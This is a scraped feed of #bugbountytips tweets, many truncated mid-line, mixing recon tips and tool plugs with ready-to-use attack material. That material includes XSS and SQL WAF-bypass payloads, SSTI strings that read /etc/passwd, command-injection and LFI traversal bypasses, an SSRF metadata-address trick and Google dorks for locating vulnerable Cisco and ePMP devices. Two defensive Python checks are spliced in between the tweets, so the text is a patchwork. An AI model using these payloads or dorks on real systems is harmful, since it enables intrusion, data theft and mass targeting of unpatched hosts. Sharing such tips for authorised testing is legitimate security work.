5. Access to internal info
#bugbountytips #bugbounty
RT @pdnuclei: #oneliner
✅ Subdomain enumeration
✅ Full port scan
✅ HTTP web server detection
#security #bugbountytips #portscan #subdomain #chaos [Link]
My #twitter and #linkedin feed is flooded with Bug Bounty tips Tweets. I am really fee
#bugbountytips #cybersecurity #LinkedIn #bounty #hacking #bugs #vulnerabilities #b
RT @chickflow0: when your report is duplicated and closed as N/A!
@Hacker0x01 - keep hunting!...
#hackerone #togetherwehitharder #bugbounty #bugbountytips #vulnerabilityanalysis #
RT @BeingjokerMeme: JSON Web Tokens | Authenticating single page apps using JWT |
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @GainSec: How to Install CloudGoat on Ubuntu Server
-
-
🤓 Follow @gainsec
-
[Link]
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
How to Answer tricky Javascript Interview Questions | #follow Javascript [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @MeetAn0nym0us: Just published an Article on Android Apps Pen-testing.
Don't forget to share your thoughts on it.
Thanks!
[Link]
#BugBounty #bugbountytips #TogetherWeHitHarder #hackerone #ItTakesCrowd https:
RT @naglinagli: Google dork for CVE-2020-3452
'inurl:[Link] "CSCOE"'
(It will find exposed Cisco SSL-VPN domains, not 100% of them are vulnerable, but mos
After reaching a login page, try one of @aboul3la POC's
#bugbountytips [Link]
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT [Link]
#javascript #hacking #USDT #Bitcoin #coding #bugbountytips #bughunting #tipsandtr
#JSON #Web #Tokens | Authenticating #single page #apps using #JWT [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @black_hat_india: Disclosing user's sensitive information like phone number, tokens
Captured login request via BURP.
/hub/v1/user/otp/login?email=attacker@[Link]
/hub/v1/user/otp/login?email=victim123@[Link]
/hub/v1/user/otp/login?email=victim456@[Link]
#bugbountytips #infosec
RT @black_hat_india: LFI to RCE
1. ffuf on "/" -> "redacted-api" -> 302
2. ffuf on "redacted-api/" -> "[Link]" -> 200
3. all operations were auth protected
4. didn't give up and tested ~200 operations
5. found LFI, no auth
6. admin creds in plaintext, logged in and got RCE
#bugbountytips [Link]
RT @dwisiswant0: FinDOM-XSS - Find for Possible DOM Based XSS Vulnerability
[Link]
Inspired by @dark_warlord14's JSScanner tool, and @aslanewre with the possible patt
#bugbounty #bugbountytips #infosec [Link]
RT @11xuxx: Twig SSTI
1. Submitted {{7*7}} and received "you password is: 49"
2. Tried "registerUndefinedFilterCallback" func, it was blocked by Imperva WAF https://
3. read Twig source code and found "registerUndefinedFunctionCallback"
4. WAF bypassed and RCE!
#bugbountytips [Link]
RT @black_hat_india: subfinder -nW -silent -t 25 -d $DOMAIN | shuffledns -silent -d $DO
Some crazy oneliners possible for subdomain discovery
#bugbountytips
RT @Yumi_Sec: An interesting trick: you can bypass a WAF during a XSS attack on ASP(d
#BugBounty #BugBountyTips #InfoSec
(Credit to Acunetix)
Full article: [Link] [Link]
RT @iambeingjoker: JSON Web Tokens | Authenticating single page apps using JWT | Ho
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @pwn0sec: Pwned @andripwn - Bypassing WAF XSS with language
/></noscript></form><script language="javascript">[Link](1
#xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting [Link]
RT @andripwn: Waf Bypassing SQL-Injections DIOS
Leads to Recon Find Cpanel Login
#bugbountytips #bypassWaf #hackerone [Link]
JSON Web Tokens | Authenticating single page apps using JWT | How to use [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Hxzeroone: #Bugbountytips
If you’re testing a website which lets you use your account on Xbox/Setup [Link] hxxp
[Link]
RT @trbughunters: Top 25 SQL Injection Parameters for @trbughunters
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @trbughunters: ☠️ Top 25 Server-Side Request Forgery (SSRF) Dorks ☠️
Note: The popularity of dorks can vary.
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @andripwn: Bug Bounty GitLab : Stored XSS in Wiki pages
Status : Patched
Writeup's here::
[Link]
#bugbounty #bugbountytips #hackerone #gitlab
RT @xalerafera: If you find the host hosting the WordPress CMS, then try to see, if xmlrp
Then, through the PingBack function, you can get Blind SSRF)
#bugbounty #hackerone #bugbountytip #bugbountytips [Link]
RT @bendtheory: just learned about ffuf’s response size filter -fs
super useful when a site returns 200 for bad paths instead of 404’s. you can even set a r
friendship ended with dirbuster
now ffuf is my best friend
#bugbountytips
RT @jdksec: Need a quick way to request 1000's of URLs in burp without crashing your b
cat [Link]| parallel -j 10 curl --proxy [Link] -sk > /dev/null
#bugbounty #bugbountytips #bugbountytip [Link]
RT @Th3G3nt3lman: P1 of the day on @Bugcrowd :
1- [Link] =>403 forbidden
2- [Link] =>Redirect to corporate SSO
3- [Link] =>IP:8005 and Api_key
4- [Link] => [Link]
5- Use key in swagger=> Info Disclosure
#bugbountytips
RT @IfrahIman_: Want to find some new subdomains for your target?
Use SecurityTrails API 🔥 to enumerate.
#bugbountytips [Link]
RT @bendtheory: XSSI example PoC to fix JS undefined/type errors
<script>
x = function(y, z) { };
prof = {'manager': {'load':null, 'fn':x}}
[Link] = function (leaked) {
alert([Link](leaked));
};
</script>
<script src="[Link]
#bugbountytips
RT @bendtheory: #xss payload for when
1. a parameter is reflected in javascript
2. it’s being inserted into the DOM via innerHTML
3. HTML encoding and not Javascript encoding is used
4. WAF blocks common payloads
\x3Ctextarea+onauxclick\x3Dconfirm(1)\x3Eright+click+here
#bugbountytips
RT @laud3b: Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips [Link]
RT @mase289: I just published The $1,000 worth cookie
A story of DOM XSS in [Link]
[Link]
#BugBounty #bugbountytips #xss
RT @AldenAous: - SQL'injection with WAF ByPass
If you find the host IP address of the target, you can remove the WAF by sending a requ
If the host accepts requests directly.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty [Link]
RT @chiraggupta8769: Account Takeover By JWT Token Forging By @_mkahmad
#bugbountytips #bugbounty [Link]
RT @trbughunters: ⛓️Get Reflected XSS within 3 minutes ⛓️
@gkhck_ from our community, wrote a write-up about the xss recon methodology!
[Link]
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip
RT @praseudo: Want to know which web files on a website are cached? Here is an online
[Link]
#bugbounty #bugbountytips #hacking #Recon #recontips #bugbountytools [Link]
RT @niravsikotaria: Dear @pdiscoveryio 😍
Thanks for the "httpx" tool, it works like a jet plane 🚀
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx
RT @m4ll0k2: Simple tool for get domain relationship.. [Link] - @Jha
RT @harshbothra_: Simple Oneliner to Filter out Domains with "200 Status" and further
cat [Link] | httpx -follow-redirects -status-code -vhost -threads 100 | sort -u | gre
#bugbountytips #bugbounty #security #infosec
RT @harshbothra_: Found an API Key/Secret/Token - Not Sure whether to report it or n
@udit_thakkur Thanks for a good tool ;)
#bugbounty #bugbountytip #bugbountytips [Link]
RT @gwendallecoguic: #onliner to extract endpoints from JS files of a given host #BugB
Regexp dependent so highly improvable!
[Link] [Link]
RT @pdnuclei: Here is how you can use #httpx to import a list of
a) URLs
b) Subdomains
c) Endpoints
to Burp suite for further crawling or scanning.
#bugbountytips #pentest #security #hackwithautomation #burpsuite [Link]
RT @AbhishekKarle3: I just published How I was able to change victim’s password using
Thanks to @musiclouderlml for sharing #bugbountytips
RT @iambeingjoker: How to Answer tricky Javascript Interview Questions | Weird Javas
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @Tismayil1: Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : [Link]
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats [Link]
RT @Random_Robbie: <?php var_dump(explode(',',ini_get('disable_functions'))); ?>
Handy as hell tip for checking which functions you need to bypass on PHP RCE.
#bugbountytips #bugbountytip
RT @hacktory1: 6 steps and 2 tools to attack JSON Web Token
[Link]
[Link]
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
How to Answer tricky Javascript Interview Questions | Weird Javascript | [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
RT @chiraggupta8769: one-liner to extract endpoints from JavaScript files by @renniepa
cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty [Link]
RT @SalahHasoneh1: Way to bypass 2FA
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @vNature0: Could you please recommend tools/scripts to test for known vulnerabilit
My website has been receiving some attempts of doing random stuff from Russia so I wa
Thanks!!
#bugbountytips #bugbountytip
Could you please recommend tools/scripts to test for known vulnerabilities?
My website has been receiving some attempts of doing random stuff from Russia so I wa
Thanks!!
#bugbountytips #bugbountytip
RT @roughwire: Duplicates, especially RCE on a bug bounty program, make you feel like hell.
#bugbountytips never check your hackerone notification before going to bed, especially w
RT @dark_warlord14: New write up around ffuf to help you speed up few things during p
Blog: [Link]
I hope it helps you in some way. Retweet if you like. Happy Hacking!!
#bugbounty
#bugbountytips [Link]
RT @MrrFawadkhann: Eid Mubarak to everyone
#bugbountytips #BugBounty
RT @Tismayil1: Yes, I was awarded $5000 in a private program.
#bugbountytips #bugbountytip #WhiteHats #wafbypass #bugbounty
- SQL'injection with WAF ByPass
If you find the host IP address of the target, you can remove the WAF by sending a requ
If the host accepts requests directly. [Link]
RT @11xuxx: Using ffuf the right way and gaining admin access
1. "ffuf -u ... --mc all" -> match all response codes
2. ctrl+c after 5 sec
3. "ffuf -u ... --mc all -fw ..."
4. found a backdoor developer used to login as admin (response code 404)
all credit goes to @joohoi
#bugbountytips [Link]
Wait !! Are you serious? are you going to help ppl to learn smt could really make an impa
Once I realized the trick to @adamtlangley's "I once was blind but now I RFC" challenge
TIL @PortSwigger's Burp Collab does SMTP!
This is insaaanely useful.
#bugbounty #bugbountytips [Link]
RT @shreyasrx: Command injection 💥
Filter Bypasses >
1/3
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
#bugbountytips
#shieldindia
#commandinjection
RT @abhishake100: I just published "Bug Bounty in Lockdown (SQLi and Business Logic
#bugbounty #bugbountytips
[Link]
RT @CristiVlad25: Tools for #bugbounty hunters. With @InsiderPhD
#bugbountytips #bughunting #ethicalhacking
[Link]
RT @D0rkerDevil: Escalated a blind Python code injection to
RCE, thanks to @imhaxormad for the help.
another #DNS_BASED_EXFILTRATION
just decode the output from base64
and you will get
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/
#bugbounty #dnsexfil #bugbountytips [Link]
Top 25 Remote Code Execution (RCE) Parameters
#bugbountytips #bugbountytip #bugbounty [Link] [Link]
RT @sh0mbo: Need to trigger that xss payload, but parens are filtered? EZ!
Function`return alert````${[Link]}`
#xss #payload #filterevasion #bugbountytips #bugbounty
RT @joeldeleep: A good way to run linkfinder if you have a list of js files #infosec #bugb
RT @Tismayil1: Yes I earned $3180.
Tools :
Sub Scanner : [Link]
Dir Scanner : [Link]
Git Dumper : [Link]
#BugBounty
#bugbountytips
#bugbountytip
#whitehat
#infosec [Link]
RT @Tismayil1: I earned $XXXX for an OS command injection in a private program.
Used Repos
1 : Dir Searcher : [Link]
2 : Sub Scanner : [Link]
#BugBounty
#bugbountytips
#bugbountytip
#whitehat [Link]
RT @_0nk4r_: Subdomain Takeover 101 ..@EdOverflow Great Blog
learned a lot
[Link]
----
#togatherwelearn #bugbountytips
How to Answer tricky Javascript Interview Questions | Weird Javascript |... [Link]
#javascript #hacking #interview #coding #bugbountytips #bughunting #tipsandtricks #
#programfolback #tutorial #code #opensource
RT @SatyamGothi: #bugbountytips for sure💯
A M A Z I N G #bugbountytips #bugbountytip #infosec [Link]
RT @d3tonator: Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
If the bypass is successful, and after a while requests are blocked again, increment the last oct
#infosec #bugbountytips
RT @d3tonator: Easy Money | P3 MAP API | Android
1. Open the apk in Jadx-gui
2. Go to [Link] > res > values > [Link]
3. Here you'll find the Google Map API Key
4. Open the URL [Link]
If the map opens, then report it.
#BugBountytips #Android #bugbounty #infosec
Wanna know the best way to be demotivated in the bug bounty field?
Compare yourself with others!
#bugbounty #bugbountytips
RT @InonShkedy: A series of articles I wrote about major changes in app development (
1: Modern vs. Traditional apps:
[Link]
2: What is Modern AppSec:
[Link]
#bugbountytips
RT @farah_hawa01: NEW VIDEO: In this video, I talk about SAML authentication, SSO’s,
[Link] [Link]
RT @s3rgiomazari3go: Some of the resources most of the professional people recommen
[Link]://[Link]/SveHxbs2Nr
[Link]://[Link]/I8colHHkwB
[Link]://[Link]/eMCUzhjaqf
#bugbountytips
RT @VirenPawar_: Second medium blog-post:
Stealing your Paytm information using XSS
[Link]
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
RT @amad3u6: You can specify the memory size for @Burp_Suite to make it smoother
~$ java -jar -Xmx3072M /path/to/[Link]
or
~$ java -jar -Xmx3G /path/to/[Link]
#bugbountytips #bugbountytip #bugbounty #infosec
RT @HossamSec: To test XSS + SQLi + SSTI/CSTI with the same payload use :
'"><svg/onload=prompt(5);>{{7*7}}
' ==> for Sql injection
"><svg/onload=prompt(5);> ==> for XSS
{{7*7}} ==> for SSTI/CSTI
#bugbounty #infosec #TogetherWeHitHarder #bugbountyprotip #Pentesting #bugboun
RT @ajdumanhug: I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out
I'll tag #BugBountyTips to notify #SecurityResearchers. Go check out these platforms an
RT @SalahHasoneh1: Extract endpoints from APK files
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #
#bugbountytips #BugBounty [Link]
[Link] MR [Link] >>> #blockchain #opensource #linux #
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip [Link] [Link]
Bug bounty fast hunting find all subdomains using all tools and then use all endpoint gra
RT @HackerOn2Wheels: Content Type Forcing - The XSS you may have missed.
This is my quick and practical blog post on how to get XSS in responses with Content-Ty
[Link]
#bugbounty #bugbountytip #BugBountyTips #infosec
Tutorial on privilege escalation and post exploitation tactics
in Google Cloud Platform environments:(PDF) 66 PAGES:
[Link]
#PenTest #Hacking #bugbountytips #redteam
RT @0xrudrapratap: @intigriti #bugbountytips
RT @sw33tLie: Friendly reminder that zdns > massdns #bugbountytips
RT @LooseSecurity: I once exploited SSTI in flask app with payload:
{{ [Link]()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").r
If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountyt
payload not by me
Bypass CSRF like a boss. Seven ways to bypass CSRF security by @harshbothra_
[Link]
#csrfbypass #bugbounty #cybersecurity #bugbountytips
RT @AmitMDubey: A small Burpsuite trick which helped me to find Blind SSRF -
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use Taborator Extension to monitor hits
#bugbounty #bugbountytips [Link]
RT @secalert: Regarding CVE-2020-5902:
[[Link]
there you will see the session files like:
"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX".
Set this in the cookie and you are in admin's session. #bugbountytips
RT @hackison: #bugbounty #bugbountytip #bugbountytips #hacking #hackison #hacke
Find SSRF issues by injecting headers (like x-forwarded-host, etc.) with this tool:
.
[Link]
#bugbountytips #bugbounty [Link]
RT @C1h2e11: A tip from Nahamsec @NahamSec
curl -X GET [Link]
[Link]
[Link] address}
Shodan search query ASN:{ASN}
#bugbountytip #bugbountytips [Link]
RT @HusseiN98D: WooT! There is always a way. New #bugbounty #pentest short write u
[Link]
RT @HusseiN98D: A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! AL
I'm interested in any security research team / pentest work (remote). If any company/t
RT @SpiderSec: 2FA Bypass Technique
#bugbounty #bugbountytips [Link]
RT @1m4xx0: And sometimes for (LFI)
url?para=//..//..//..//..//..//..//..//..//etc//passwd//
Works!!
#bugbountytip
#BugBounty
#bugbountytips
#bugbounty
RT @ja1sharma: Infosec meme for BugBounty hunters.
#Bugbounty #BurpSuite #Scanner #bugbountytips #infosec #MEMES #XSS #SQLi https
Shellshock still works on some servers; you can also try the
nmap script.
nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty [Link]
RT @malcolmx0x: host:attacker,com>> blocked
host:attacker,com
x-forwarded-host:target,com>>ATO
#bugbountytips
RT @HossamSec: Add this endpoint to your DIRs list You may get lucky and access a das
/uplynk/examples/[Link]
Make your own private lists of DIRs while hunting and you may get lucky and access crit
#BugBountyTips #infosec [Link]
RT @HusseiN98D: Analysis of an RCE I found past week. RT and Like if you want more! I
Part 1: [Link]
Part 2: [Link]
#bugbountytips #bugbounty
RT @Santhoshvr97: use file:// instead of http:// in parameter.
sometimes it will bypass URL restrictions while redirect in page and use this payload to
it will work.. ✌️
Payload: [Link]
#bugbounty #bugbountytips #infosec
#xss
RT @anspattnaik: #bugbountytips #BugBounty
Just exploited a template injection vulnerability: {{7*7}} = 49
and I'm pretty sure it's using a Jinja2 template, but when I try the payload below the results ar
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
any suggestions?
RT @Sahad_nk: Found a JIRA SSRF and want to make it more impactful? Look for what's
#BugBounty #BugBountyTips #HackerOne #BugCrowd #Synack [Link]
RT @hackison: [Sensitive Directories] intitle:"Index of" [Link]
[Sensitive Directories] intitle:[Link]./.sql
[Pages Containing Login Portals] site:*/cgi-bin/[Link]
[Various Online Devices] inurl:[Link] [Link]
#dorks #hacking #bugbountytip #bugbountytips #pentesting
RT @HusseiN98D: Time for another #BugBountyTip : While testing file upload forms on I
RT @0x240x23elu: Find subdomain CNAME with one liner #bugbountytips #bug #subdom
This may be old [Link]
RT @noobsec_org: Always view the page source code, sometimes you get some GOLD like m
#bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehithard
RT @HusseiN98D: #BugBountyTip time: combine Arjun from @s0md3v with Burp Intruder
#bugbountytips #pentest RT & L
RT @HusseiN98D: #BugBountyTip time: I've got a RCE by using this tip: while testing fo
Sometimes this fools the backend and you get a shell! RTs & comments are appreciate
RT @cry__pto: Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
RT @HusseiN98D: #BugBountyTip time: when you see a POST request made with JSON,
Follow, book coming!
RT @TakSec: XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic [Link]
RT @bugbountyvillag: Tip by @thedawgyg
When testing for SSRF using a black list, take internal IP addresses and when encoding
#bugbountytip #bugbounty #bugbountytips
RT @YourNextBugTip: All CSRF Bypasses from all over the net.
The last one is the most interesting one (bypass XHTTPRequest check using flash), but not e
Did I miss anything?
#bugbountytips #bugbountytip #bugbounty [Link]
RT @bugbountynights: You can check Jira Information Disclosure vulnerability (CVE-201
RT @mrunal110: Find CNAME Records #bugbounty #vulnerability #informationsecurity #
#Bugbountytips [Link]
RT @_Y000_: Ondblclick xss Payloads
<h1 ondblclick=alert`_Y000!_`>_Y000!_</h1>
<marquee ondblclick=alert`_Y000!_`>_Y000!_</marquee>
<xss ondblclick="alert`_Y000!_`" autofocus tabindex=1>_Y000!_</xss>
<w="/x="y>"/ondblclick=`<`[confir\u006d`_Y000!_`]>z
#xss #payloads #bugbountytips
RT @kobsoNinja: Bypassing SSRF Filter using Enclosed Alphanumerics
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
Credit: @EdOverflow
#BugBountyTips
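The circled-digit metadata address above, together with the earlier tip about internal IPs in alternative encodings, as an added example that is not code from either tweet: a literal deny-list that the payload walks past, and a check that normalises the host with NFKC, parses it as an address (including the dotless-decimal form inet_aton accepts), and then asks the address whether it is globally routable. The deny-list entries, sample URLs and the use of Python's ipaddress/socket modules are assumptions.

```python
"""SSRF deny-list vs. address-based check, using the enclosed-digit AWS metadata host.

Added example for the two SSRF tips above; not the tweet authors' code. The
deny-list, the URLs and the stdlib checks used are assumptions.
"""
import ipaddress
import socket
import unicodedata
from urllib.parse import urlsplit

# What a string-based deny-list usually carries.
DENY_LITERALS = ("127.0.0.1", "localhost", "169.254.169.254", "10.", "192.168.", "172.16.")

METADATA_PLAIN = "http://169.254.169.254/latest/meta-data/"
METADATA_ENCLOSED = "http://①⑥⑨.②⑤④.①⑥⑨.②⑤④/latest/meta-data/"   # payload from the tweet
PUBLIC = "http://8.8.8.8/"


def normalized_host(url: str) -> str:
    """Hostname with Unicode compatibility characters folded to ASCII (NFKC):
    the circled digits become 169.254.169.254, fullwidth digits become digits."""
    host = urlsplit(url).hostname or ""
    return unicodedata.normalize("NFKC", host)


def blocked_naive(url: str) -> bool:
    """Literal prefix match against the deny-list: the filter the tweet bypasses."""
    host = urlsplit(url).hostname or ""
    return any(host.startswith(bad) for bad in DENY_LITERALS)


def blocked_hardened(url: str) -> bool:
    """Normalise, parse as an address, and decide on what the address is rather
    than on how it was spelled. Anything not globally routable is refused."""
    host = normalized_host(url)
    if host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            # Dotless decimal / octal / hex spellings (2130706433, 0177.0.0.1, ...)
            # are what inet_aton, and therefore most HTTP clients, accept.
            addr = ipaddress.IPv4Address(socket.inet_aton(host))
        except (OSError, ValueError):
            # Not an IP literal at all. A real filter resolves the name, applies
            # this same test to every returned address and pins the connection
            # to it; that needs DNS, so it is left out of this offline example.
            return False
    return not addr.is_global


if __name__ == "__main__":
    print(normalized_host(METADATA_ENCLOSED))            # 169.254.169.254
    print(blocked_naive(METADATA_ENCLOSED))              # False: bypassed
    print(blocked_hardened(METADATA_ENCLOSED))           # True
    print(blocked_hardened("http://2130706433/"))        # True: 127.0.0.1 in decimal
    print(blocked_hardened(PUBLIC))                      # False
```

The normalisation step matters because the HTTP client, not the filter, is what eventually turns ①⑥⑨ into 169: whichever layer interprets the host last is the one whose view the check has to match.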
RT @ankit_2812: Bugbounty tips#2
Try these MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~[Link]`test`
SELECT\NFROM`test`
SELECT@^[Link]`test`
[Link]`test`
#SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hacke
RT @AbdoFarwan: Notes from @NahamSec's awesome interview with @inhibitor181.
#BugBounty
#bugbountytips [Link]
RT @Jhaddix: I know it's common sense but remember when parsing JS for endpoints/fi
/ = Root directory
. = This location
.. = Up a directory
./ = Current directory
../ = Parent of current directory
../../ = Two directories backwards
#bugbountytips ?
RT @HusseiN98D: Simple script to gather all TLDs of a company:
value=$(echo "$1" | cut -f1 -d.)
echo "$value"
sed -e "s/^/$value./" /root/wordlist/[Link] | filter-resolved
Usage: bash [Link] [Link]
#bugbountytips #bugbountytip [Link]
RT @Yumi_Sec: If a web application allows you to upload a .zip file, zip:// is an interestin
#BugBounty #BugBountyTips #InfoSec [Link]
RT @HusseiN98D: Testing Password Reset Functionalities. If you can think of other tes
#BugBounty #BugBountyTips #BugBountyTip #pentest [Link]
RT @mark_valenzia: Massive thanks to @d0nutptr for his awesome blog on SSRF and @s
#bugbountynoob #bugbountytips [Link]
RT @pwntheweb: Bypassing most FILE Uploads filters for $$$$
* .htaccess <- upload htaccess
* [Link] <- uploading svg = xss
* [Link] <- must try case mismatch
* [Link]
* [Link]%[Link]
* [Link]' or '1'='1
* ../../[Link]
* file.'svg <- invalid ext.
#bugbountytips #BugBounty
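The upload tricks above in code, as an added example that is not the tweet author's: the case-sensitive suffix deny-list that case mismatch, double extensions and null bytes defeat, beside an allowlist check that refuses those and replaces the client's filename outright. The extension sets and the storage-name scheme are assumptions.

```python
"""Upload filename checks: the deny-list the tweet's tricks defeat, and an allowlist that does not.

Added example for the upload-bypass list above; not the tweet author's code. The
allowed/denied extension sets and the storage-name scheme are assumptions.
"""
import re
import secrets
from typing import Optional

DENY_SUFFIXES = (".php", ".phtml", ".php5", ".htaccess")   # assumed deny-list
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}                 # assumed allowlist; no svg, it can carry script
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def accept_deny_list(filename: str) -> bool:
    """Case-sensitive suffix deny-list, as commonly written."""
    return not any(filename.endswith(s) for s in DENY_SUFFIXES)


def storage_name(filename: str) -> Optional[str]:
    """Allowlist the extension, refuse anything odd, never reuse the client's name.
    Returns the name to store under, or None to reject the upload."""
    # NUL and control characters: ".php%00.jpg" style truncation tricks.
    if any(ord(c) < 32 or c == "\x7f" for c in filename):
        return None
    # Path separators: the server decides where the file lives, not the client.
    if "/" in filename or "\\" in filename:
        return None
    stem, dot, ext = filename.rpartition(".")
    # Exactly one dot: rejects "shell.php.jpg" and dotfiles such as ".htaccess".
    if not dot or "." in stem or not STEM_RE.match(stem):
        return None
    ext = ext.lower()                 # "JPG", "jPg" and "jpg" are the same extension
    if ext not in ALLOWED_EXT:        # also rejects "'svg" and other junk extensions
        return None
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("shell.PhP", "shell.php.jpg", "logo.svg", ".htaccess", "Photo.JPG"):
        print(f"{name!r:20} deny-list: {accept_deny_list(name)!s:5} allowlist: {storage_name(name)}")
```

The extension check only decides what gets stored; serve uploads from a separate origin (or with Content-Disposition: attachment and no script execution) so that a file which slips through is still inert.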
Done with subdomain enumeration? Here is how you can get more assets related to you
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips [Link]
RT @shreyasrx: Cambium ePMP 1000 vulnerable to command execution and changing o
1/2
Google dork >
intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*
A Lot of hosts are still vulnerable.
#bugbountytips
#shieldindia
#Hacking [Link]
RT @gwendallecoguic: Short @oneliner to retrieve altnames from ssl certificates. Thanks
[Link] [Link]
RT @SalahHasoneh1: Price Manipulation Method 3
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @debangshu_kundu: Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
I just published Android App Security & Testing [Link]
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @_sickwiz: Another govt website. Reported to @NCIIPC. Though they don't offer bounty, but this ap
#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability [Link]
RT @Jhaddix: #bugbounty #bugbountytips People sometimes ask how you can "eyeball" a site and kn
discovery! [Link]
A series of articles I wrote about major changes in app development (microservices, CI/
1: Modern vs. Traditional apps:
[Link]
2: What is Modern AppSec:
[Link]
#bugbountytips
RT @Debian_Hunter: Best place for understanding GraphQL, thnx man #bugbountytips #bughunting #infosec
RT @0xLupin: That's why you should stop reporting a simple alert box and start thinking
If you don't trust my words trust @MrMustacheMan3 and @brutelogic :)
#hacking #bugbounty #bugbountytips #hacker #XSS #RCE [Link]
RT @neutrinoguy: Best way to search Project Sonar database for subdomain enumeration.
[Link]
Credits to @CalumBoal
#bugbountytips
RT @ssh0x00r: thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor
#bugbountytips #Pentesting #hacking #infosec
RT @BeingBharatiyaa: @AmazonHelp @amazon getting error page by clicking on 'Communication Preferences'
RT @bountyhunter_fr: Subdomain recon tools step by step :
1) amass - scan for subdomains
2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports
#bugbountytips
RT @AldenAous: Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : [Link]
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats [Link]
RT @OAcybersecurity: FORD Session token URL leads to Reflected XSS #bugbountytips #bugbounty #hackerone
RT @sillydadddy: #bugbountytips
Does anyone have a list of root domains of all public programs in the BB platforms?
Could you please share ?
If not I am planning to make one and share
thanks
RT @Rajat_sharma111: Recently, I have started using the tool "Arjun" for finding the hidden parameters, howev
“Learning path for Bug Bounty” by Udit Bhadauria [Link]
#cybersecurity #bugbounty #bugbountytips
RT @adrien_jeanneau: A little #BugBountyTips that I use for my recon: use this Google D
RT @rapiddns: The [Link] Updates.
Added:
[*] 360 million mx records
[*] Support CIDR format query
[*] Subdomain query matches cname records
Removed:
[*] Recent query
#recon #bugbounty #bugbountytip #bugbountytips #hackerone [Link]
RT @s3rgiomazari3go: Note 3: Google Chrome uses an XSS auditor, which when testing thinks that you are doin
#bugbountytips #infosec #hacking
